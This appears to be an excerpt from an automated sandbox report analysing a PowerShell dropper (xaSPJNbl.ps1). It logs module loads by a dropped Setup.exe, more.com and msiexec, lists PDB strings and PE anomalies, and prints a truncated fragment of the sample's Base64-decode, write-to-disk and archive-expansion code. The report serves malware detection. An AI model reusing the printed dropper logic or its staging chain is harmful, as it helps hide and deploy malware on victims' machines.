                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: qt5core.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: steam_api64.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: libcrypto-1_1-x64.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: qt5network.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: libssl-1_1-x64.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: msvcp140_1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: qt5core.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: steam_api64.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: libcrypto-1_1-x64.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: qt5network.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: libssl-1_1-x64.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: msvcp140_1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: xaSPJNbl.ps1Static file information: File size 47033442 > 1048576
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: Setup.exe, 00000004.00000003.1903835083.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.2044770209.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000007.00000002.2085414094.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdbGCTL source: Setup.exe, 00000004.00000003.1903835083.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.2044770209.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000007.00000002.2085414094.00007FFBA9C86000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1s 1 Nov 2022built on: Fri Feb 3 01:12:04 2023 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\dist\pc64_dll_release\lib\engines-1_1"not available source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: d:\Develop\dev-Milky\libs\mfclibs\ICQSkinUtils\ICQSkinUtils\_dmt\LiteSkinUtils.pdbWW source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: Setup.exe, 00000004.00000002.2052868230.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp, Setup.exe, 00000007.00000002.2086323457.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: wntdll.pdbUGP source: more.com, 00000008.00000002.2013062507.00000000048A0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013369968.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libcrypto-1_1-x64.pdb source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1D15000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04687000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1D15000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000003.1994011222.000002563DEF0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: Setup.exe, 00000004.00000002.1945495653.0000029C06FA0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1942306525.0000029C06BA2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1957372633.0000029C071AD000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2018428447.0000025640912000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013762787.000002564031E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013949015.0000025640710000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2052868230.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp, Setup.exe, 00000007.00000002.2086323457.00007FFBBCF53000.00000002.00000001.01000000.00000011.sdmp
                    Source: Binary string: wntdll.pdb source: more.com, 00000008.00000002.2013062507.00000000048A0000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000008.00000002.2013369968.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Core.pdb source: Setup.exe, 00000004.00000002.2020848996.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000007.00000002.2078219554.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Setup.exe, 00000004.00000002.2050358782.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp, Setup.exe, 00000007.00000002.2086102566.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2050358782.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp, Setup.exe, 00000007.00000002.2086102566.00007FFBBB741000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdbete All MessagesKAre you sure that you want to permanently delete all history for this user?!Delete: All history for this user=Are you sure that you want to permanently delete all history? source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: FatalErrorWarningDebugassert.report.fatalassert.report.errorassert.report.warningassert.report.debugassert.report.unknownasserts already initializedeax::foundation::initAssertionssAssertFailureFn == nullptr.pdb source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: D:\Projects\WinRAR\rar\build\unrardll32\Release\UnRAR.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198B9E84000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Setup.exe, 00000004.00000002.2055448652.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp, Setup.exe, 00000007.00000002.2086516653.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp
                    Source: Binary string: .pdb.map.___> => > source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: Setup.exe, 00000004.00000002.1996466657.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000002.2062596450.00007FFBA1C93000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libssl-1_1-x64.pdb source: Setup.exe, 00000004.00000002.2039104912.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2084518585.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: ntdll.pdb source: Setup.exe, 00000004.00000002.1945495653.0000029C06FA0000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1942306525.0000029C06BA2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000002.1957372633.0000029C071AD000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2018428447.0000025640912000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013762787.000002564031E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013949015.0000025640710000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Network.pdb source: Setup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\eaSteamProxy\pc64-vc-tool-opt\bin\EASteamProxy.pdb source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: d:\Develop\dev-Milky\libs\mfclibs\ICQSkinUtils\ICQSkinUtils\_dmt\LiteSkinUtils.pdb source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\eaSteamProxy\pc64-vc-tool-opt\bin\EASteamProxy.pdbc source: Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: D:\juno\p4\desktop\packages\openSSL\1.1.1s\installed\source\libssl-1_1-x64.pdb?? source: Setup.exe, 00000004.00000002.2039104912.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2084518585.00007FFBA9BF4000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: c:\buildslave\steam_rel_client_win64\build\src\steam_api\win64\Release\steam_api64.pdb source: Setup.exe, 00000004.00000002.2048428381.00007FFBA9CE7000.00000002.00000001.01000000.0000000B.sdmp, Setup.exe, 00000007.00000002.2085703925.00007FFBA9CE7000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Setup.exe, 00000004.00000002.2055448652.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp, Setup.exe, 00000007.00000002.2086516653.00007FFBC3145000.00000002.00000001.01000000.00000012.sdmp
                    Source: Binary string: C:\Develop\dev-Milky\apps\ICQBasic\MIBResources\MIBResources\Eng\_dmt\LiteRes.pdbqsutuuuvwz~ source: powershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Q:\build\qt\qtbase\lib\Qt5Core.pdbT source: Setup.exe, 00000004.00000002.2020848996.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000007.00000002.2078219554.00007FFBA223C000.00000002.00000001.01000000.0000000A.sdmp

                    Data Obfuscation

                    barindex
                    Found suspicious powershell code related to unpacking or dynamic code loading
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($ljulRGEi) [System.IO.File]::WriteAllBytes($TLcoKujt, $HRYBsGNb) $ABlvAjxl = New-Item -ItemType Directory -Path $oLsXWGVm try { $czMOrxkv = Expand-Archive -Path $TLcoK
                    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.drStatic PE information: 0x775CB74C [Thu Jun 16 20:02:20 2033 UTC]
                    Source: Qt5Network.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x1579cb
                    Source: libssl-1_1-x64.dll.4.drStatic PE information: real checksum: 0x0 should be: 0xa8dea
                    Source: libcrypto-1_1-x64.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x2bdc1b
                    Source: LiteSkinUtils.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x1a34f
                    Source: Qt5Core.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x600b8c
                    Source: LiteRes.dll.1.drStatic PE information: real checksum: 0x0 should be: 0xb9e4d
                    Source: ICQLiteShell.dll.1.drStatic PE information: real checksum: 0x0 should be: 0xe60c
                    Source: mvrSettings32.dll.1.drStatic PE information: real checksum: 0x1157fe should be: 0x114a45
                    Source: Qt5Core.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x600b8c
                    Source: ICQRT.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x15007
                    Source: libcrypto-1_1-x64.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x2bdc1b
                    Source: Qt5Network.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x1579cb
                    Source: ktb.8.drStatic PE information: real checksum: 0x0 should be: 0x59f71
                    Source: accpl.12.drStatic PE information: real checksum: 0x0 should be: 0x59f71
                    Source: libssl-1_1-x64.dll.1.drStatic PE information: real checksum: 0x0 should be: 0xa8dea
                    Source: vcl120.bpl.1.drStatic PE information: real checksum: 0x1fb2c0 should be: 0x1f8d56
                    Source: mvrSettings32.dll.1.drStatic PE information: section name: .didata
                    Source: libcrypto-1_1-x64.dll.1.drStatic PE information: section name: .00cfg
